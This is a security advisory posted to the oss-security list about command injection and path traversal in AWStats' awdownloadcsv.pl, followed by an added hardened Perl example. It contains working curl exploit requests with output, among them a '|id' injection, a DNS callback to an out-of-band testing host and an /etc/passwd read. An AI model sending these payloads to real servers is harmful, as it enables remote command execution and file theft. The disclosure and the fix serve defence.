Message-ID: <Z2Y_rOJaVlLCYFBjgdkkl4SNaDAPnNTwxykLMSRBhRmA_lpIrjmLP4zrLhBwL1KHxJ465aMmWAEG4nTm5bHvY2o7KMUdoUJ-427OZLiHxDk=@vadersecurity.com>
Date: Sun, 08 Mar 2026 08:26:23 +0000
From: "christopher.downs" <christopher.downs@...ersecurity.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: AWStats awdownloadcsv.pl command injection and path traversal vulnerabilities

Evening,
Two vulnerabilities were identified in the AWStats CGI script awdownloadcsv.pl that may allow command injection and arbitrary file access.

Repository:
https://github.com/eldy/AWStats/tree/develop

Examples shown below are running locally in a Docker container for demonstration. 

Download functionality is disabled (the default):
my $ALLOWDOWNLOAD=0

#!/usr/bin/perl -w
#------------------------------------------------------------------------------
# Free addition to AWStats Web Log Analyzer. Used to export the contents of
# sections of the Apache server log database to CSV for use in other tools.
# Works from command line or as a CGI.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#------------------------------------------------------------------------------
use CGI qw(:standard);

my $ALLOWDOWNLOAD=0;
----- SNIP -----

Issue 1: Command Injection

The "section" parameter appears to be incorporated into shell commands without proper sanitization. Injection of shell metacharacters such as "|" may allow an attacker to escape the intended command pipeline. 

Example request(s):

vectorium-x[main] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=&inputFile=|id&outputFile=/tmp/j.csv'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
vectorium-x[main] %

vectorium-x[main*] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=&inputFile=|getent%20hosts%20d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun&outputFile=/tmp/j.csv'

206.189.156.69  d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun
vectorium-x[main*] %

/tmp % interactsh-client -dns-only -o /tmp/interact_$(date +%s).interact
    _       __                       __       __
   (_)___  / /____  _________ ______/ /______/ /_
  / / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
 / / / / / /_/  __/ /  / /_/ / /__/ /_(__  ) / / /
/_/_/ /_/\__/\___/_/   \__,_/\___/\__/____/_/ /_/

projectdiscovery.io

[INF] Current interactsh version 1.3.0 (latest)
[INF] Listing 1 payload for OOB Testing
[INF] d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (AAAA) from 66.185.115.247 at 2026-03-08 07:02:25
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (AAAA) from 66.185.115.247 at 2026-03-08 07:02:25
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (A) from 66.185.115.247 at 2026-03-08 07:02:25

Issue 2: Path Traversal / Arbitrary File Read

The "inputFile" parameter is used directly in file operations without validation, allowing directory traversal.

Example code pattern:

if ($q->param("inputFile")) {
    if ($inputFile eq '') { $inputFile = $q->param("inputFile"); }
}

# Two-argument open: besides being a path, the name is also parsed for a
# leading or trailing "|" (pipe to/from a command) and for "<" / ">" prefixes.
open (IN, $inputFile) || die "cannot open $inputFile\n";

Example request:

vectorium-x[main] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=|root&inputFile=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&outputFile=/tmp/pwnd.csv'
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing,List,Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
vectorium-x[main] %

/tmp/pwnd.csv written to disk:
vectorium-x[main] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=|root&inputFile=|cat%20/tmp/pwnd.csv&outputFile='
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
----- SNIP -----

Impact

Depending on deployment configuration, these issues may allow:

- command execution
- reading arbitrary files
- writing attacker-controlled output files


Disclosure

The upstream developer was contacted previously regarding these issues. No response was received, so this notice is being sent to the oss-security list for awareness.

August 30th 2025
September 6th 2025

Thanks All --


Sent with Proton Mail secure email.
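A hardened version of the open() pattern quoted under Issue 2, added here as an example; it is not AWStats' own code and not from the author of the post. It assumes a data directory held in $ALLOWED_DIR and constructs a sample data file for the demonstration. It relies on two documented Perl behaviours: the two-argument open() treats a leading or trailing "|" in the file name as a pipe to or from a command, while the three-argument form with an explicit mode takes the name literally. Name validation and a realpath()-based containment check cover the traversal half of the report.

```perl
#!/usr/bin/perl
# Added example, not AWStats code: hardened handling of a user-supplied
# input file name for a CSV export. The directory and file names below
# are constructed for the demonstration.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Only regular files directly inside this directory may be read. It is set in
# the demonstration section below; a deployment would point it at the data dir.
my $ALLOWED_DIR;

# Return the canonical path of $name inside $ALLOWED_DIR, or undef if the name
# is not acceptable. The whitelist rejects "/", "|", "<", ">" and NUL bytes
# before any filesystem call; realpath() then resolves ".." and symlinks, so the
# containment check is made on the real location, not on the client's string.
sub safe_input_path {
    my ($name) = @_;
    return undef unless defined $name && $name =~ /\A[\w.\-]+\z/;
    my $real_dir = realpath($ALLOWED_DIR);
    return undef unless defined $real_dir;
    my $real = realpath(File::Spec->catfile($real_dir, $name));
    return undef unless defined $real && -f $real;      # must exist, be a file
    return undef unless index($real, "$real_dir/") == 0; # must stay inside dir
    return $real;
}

# Three-argument open with an explicit '<' mode: the name is taken literally,
# so "|id" would be looked up as a file called "|id", never run as a command.
sub read_csv_source {
    my ($name) = @_;
    my $path = safe_input_path($name);
    die "input file not permitted\n" unless defined $path;
    open(my $in, '<', $path) or die "cannot open $path: $!\n";
    local $/;                      # slurp mode
    my $content = <$in>;
    close $in;
    return $content;
}

# --- demonstration with a temporary directory standing in for the data dir ---
$ALLOWED_DIR = tempdir(CLEANUP => 1);
my $sample = File::Spec->catfile($ALLOWED_DIR, 'awstats032026.example.txt');
open(my $out, '>', $sample) or die "cannot create $sample: $!\n";
print {$out} "BEGIN_GENERAL\nLastLine 1\nEND_GENERAL\n";   # constructed content
close $out;

for my $name ('awstats032026.example.txt', '|id', 'id|',
              '../../../../etc/passwd', '..', 'missing.txt') {
    my $path = safe_input_path($name);
    printf "%-26s -> %s\n", $name, defined $path ? 'allowed' : 'rejected';
}
print read_csv_source('awstats032026.example.txt');
```

Run it with `perl`: only the sample file name is accepted; the pipe forms, the traversal string, ".." and a non-existent name are all rejected before open() is reached. The same containment check belongs in front of the outputFile parameter before anything is written, since the report notes attacker-controlled output paths as a third impact.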